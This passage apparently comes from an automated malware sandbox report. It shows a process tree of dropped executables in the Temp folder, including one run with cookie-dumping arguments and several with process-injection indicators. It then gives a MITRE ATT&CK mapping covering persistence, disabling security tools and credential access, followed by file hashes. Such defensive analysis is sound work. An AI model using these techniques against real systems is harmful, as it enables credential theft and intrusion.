                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2700
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4792
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                      1⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3956
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                        2⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Checks processor information in registry
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Modifies registry class
                                                                                        PID:2096
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:2152
                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      PID:4084
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4444
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5728
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      PID:5908
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:6084
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5296
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:2508
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                      1⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      PID:1856
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:6088
                                                                                    • C:\Users\Admin\AppData\Local\Temp\E60B.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\E60B.exe
                                                                                      1⤵
                                                                                        PID:5360
                                                                                      • C:\Users\Admin\AppData\Local\Temp\EE3A.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\EE3A.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4588
                                                                                      • C:\Users\Admin\AppData\Local\Temp\F436.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\F436.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6044
                                                                                      • C:\Users\Admin\AppData\Local\Temp\FB6B.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\FB6B.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies system certificate store
                                                                                        PID:5984
                                                                                        • C:\Users\Admin\AppData\Local\Temp\339802969.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\339802969.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2196
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:5360
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1230843919.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1230843919.exe"
                                                                                          2⤵
                                                                                            PID:5292
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              3⤵
                                                                                                PID:5552
                                                                                          • C:\Users\Admin\AppData\Local\Temp\119.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\119.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2324
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:5888
                                                                                            • C:\Users\Admin\AppData\Local\Temp\570.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\570.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4392
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                                PID:4148
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:1052
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:4332
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:4912
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5112
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:964
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5576
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5020
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                        1⤵
                                                                                                          PID:4156
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                            PID:4832
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:6132
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                              1⤵
                                                                                                                PID:2352
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:4704
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:2968

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                              Persistence

                                                                                                              Registry Run Keys / Startup Folder

                                                                                                              1
                                                                                                              T1060

                                                                                                              BITS Jobs

                                                                                                              1
                                                                                                              T1197

                                                                                                              Defense Evasion

                                                                                                              Disabling Security Tools

                                                                                                              2
                                                                                                              T1089

                                                                                                              Modify Registry

                                                                                                              5
                                                                                                              T1112

                                                                                                              BITS Jobs

                                                                                                              1
                                                                                                              T1197

                                                                                                              Install Root Certificate

                                                                                                              1
                                                                                                              T1130

                                                                                                              Credential Access

                                                                                                              Credentials in Files

                                                                                                              4
                                                                                                              T1081

                                                                                                              Discovery

                                                                                                              Software Discovery

                                                                                                              1
                                                                                                              T1518

                                                                                                              Query Registry

                                                                                                              4
                                                                                                              T1012

                                                                                                              System Information Discovery

                                                                                                              5
                                                                                                              T1082

                                                                                                              Security Software Discovery

                                                                                                              1
                                                                                                              T1063

                                                                                                              Peripheral Device Discovery

                                                                                                              1
                                                                                                              T1120

                                                                                                              Remote System Discovery

                                                                                                              1
                                                                                                              T1018

                                                                                                              Collection

                                                                                                              Data from Local System

                                                                                                              4
                                                                                                              T1005

                                                                                                              Command and Control

                                                                                                              Web Service

                                                                                                              1
                                                                                                              T1102

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • C:\Program Files\Windows Defender Advanced Threat Protection\LRFFKXEWKW\ultramediaburner.exe
                                                                                                                MD5

                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                SHA1

                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                SHA256

                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                SHA512

                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                              • C:\Program Files\Windows Defender Advanced Threat Protection\LRFFKXEWKW\ultramediaburner.exe
                                                                                                                MD5

                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                SHA1

                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                SHA256

                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                SHA512

                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                              • C:\Program Files\install.dat
                                                                                                                MD5

                                                                                                                806c3221a013fec9530762750556c332

                                                                                                                SHA1

                                                                                                                36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                SHA256

                                                                                                                9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                SHA512

                                                                                                                56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                              • C:\Program Files\install.dat
                                                                                                                MD5

                                                                                                                31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                SHA1

                                                                                                                c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                SHA256

                                                                                                                b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                SHA512

                                                                                                                3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                              • C:\Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • C:\Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • C:\Program Files\libEGL.dll
                                                                                                                MD5

                                                                                                                cc0f81a657d6887e246f49151e60123d

                                                                                                                SHA1

                                                                                                                1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                SHA256

                                                                                                                31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                SHA512

                                                                                                                8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                MD5

                                                                                                                efa8c02f19d23a645a42fda3613f137a

                                                                                                                SHA1

                                                                                                                aaf83888b5a80c1e6974e7c0a3fc6d4f83545e9f

                                                                                                                SHA256

                                                                                                                5c1d35ed150236750fb98f8542ec911696cdd85a79c7eb6f6b04b928811922a9

                                                                                                                SHA512

                                                                                                                923d9c778b426a2605b25f886e5634fe8683b2ce3262a5a5d0f0b54751de9d8423221d036bfdc1e11026f9693706ad262d9576b83078e78263d5675ca89c1e6b

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                MD5

                                                                                                                745db20fd3e289a001fd17d7e73c7b28

                                                                                                                SHA1

                                                                                                                6e99d180a44e0f9226672e9c5cfd796561f3e619

                                                                                                                SHA256

                                                                                                                d1e8b6205077152ab171194ebac11a5a6afa62be991643d99d7831412eea96c4

                                                                                                                SHA512

                                                                                                                8a33dcef7f679f12c34151b0dbacbe738d0d46c75e73f67a93d494117c04376ea3a52ffa5b8adf8b319b380f690b444d2fa1db8d195587bfe938a716869a7a42

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                MD5

                                                                                                                8e4ff690acaeb8fbaea2c8a00c0d8c64

                                                                                                                SHA1

                                                                                                                f712fe3fd92d167e476a6217bad4986e0739a5d8

                                                                                                                SHA256

                                                                                                                29db05c3bd1169d1482479d680bdbf92749b3448d856de33408c6f24c76d013c

                                                                                                                SHA512

                                                                                                                834f2f6c67fb46cb005790191796407e87cfd6064930f505c60575f10ece7bb4dede146c8a05f3540d4a7c92815a0a299cac6f4abeadef92ca822ee486abcb55

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                MD5

                                                                                                                4469fa8969956b459d9c5efddd1908bb

                                                                                                                SHA1

                                                                                                                8d85339ce1fb1b7d01fda35d13be9f160c6aa3f1

                                                                                                                SHA256

                                                                                                                75ca6725887002025a0c4cff8d796922d03252b6fb9607f9d499e5385a19b783

                                                                                                                SHA512

                                                                                                                ea16bd9645e9c53021ba77cc13c838597364d5f86fddfebf7c5b90bd910ec5211caafe4a0f9374ff924c23a434e56b8e70c4866be4905f2cf8c4309ab37dc282

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                MD5

                                                                                                                00554c6cf55956b536dad23cf24923ee

                                                                                                                SHA1

                                                                                                                9d437ffb947f9f397a815139138a982e616df63c

                                                                                                                SHA256

                                                                                                                d3c10cba5506a4cd125dab80f24007fa0bede904fd1dfc8e3f0c2ec82b33ceca

                                                                                                                SHA512

                                                                                                                ce4155224cbc22c5167d766d85153be7f7c8e56d3e92de45a254a9b395ac87d3942ca37b1aa8d78ff6d72c78b25f05593401c2b7569df99df1f3d94bc2987467

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                MD5

                                                                                                                3b624712fa47483c6fc5c794ed27a043

                                                                                                                SHA1

                                                                                                                ea3d68bce80f2a933534d2c84a789a75cd89b12c

                                                                                                                SHA256

                                                                                                                13e4460f9454bc9e5dd05355528b3f2cae1833123de8bf5cfed9f67a34e9a575

                                                                                                                SHA512

                                                                                                                0a71f4598cd3c677883f52f917ad9bdaaae3b606f1a547aceac52132b051081547bb4e96081607317bfb8c2697e5e748a43b2881801f57b3afa306a397a5c6f9

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\08-8b8b0-e0a-4ba82-a336561c2d013\Xoraefyjera.exe
                                                                                                                MD5

                                                                                                                18e49540637bccc9b3a7ca3d48cae223

                                                                                                                SHA1

                                                                                                                b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                SHA256

                                                                                                                698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                SHA512

                                                                                                                a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\08-8b8b0-e0a-4ba82-a336561c2d013\Xoraefyjera.exe
                                                                                                                MD5

                                                                                                                18e49540637bccc9b3a7ca3d48cae223

                                                                                                                SHA1

                                                                                                                b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                SHA256

                                                                                                                698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                SHA512

                                                                                                                a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\08-8b8b0-e0a-4ba82-a336561c2d013\Xoraefyjera.exe.config
                                                                                                                MD5

                                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                                SHA1

                                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                SHA256

                                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                SHA512

                                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11ln5dde.ezn\inst.exe
                                                                                                                MD5

                                                                                                                edd1b348e495cb2287e7a86c8070898d

                                                                                                                SHA1

                                                                                                                682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                SHA256

                                                                                                                eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                SHA512

                                                                                                                613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11ln5dde.ezn\inst.exe
                                                                                                                MD5

                                                                                                                edd1b348e495cb2287e7a86c8070898d

                                                                                                                SHA1

                                                                                                                682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                SHA256

                                                                                                                eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                SHA512

                                                                                                                613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                MD5

                                                                                                                25d9f83dc738b4894cf159c6a9754e40

                                                                                                                SHA1

                                                                                                                152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                SHA256

                                                                                                                8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                SHA512

                                                                                                                41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                MD5

                                                                                                                25d9f83dc738b4894cf159c6a9754e40

                                                                                                                SHA1

                                                                                                                152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                SHA256

                                                                                                                8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                SHA512

                                                                                                                41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

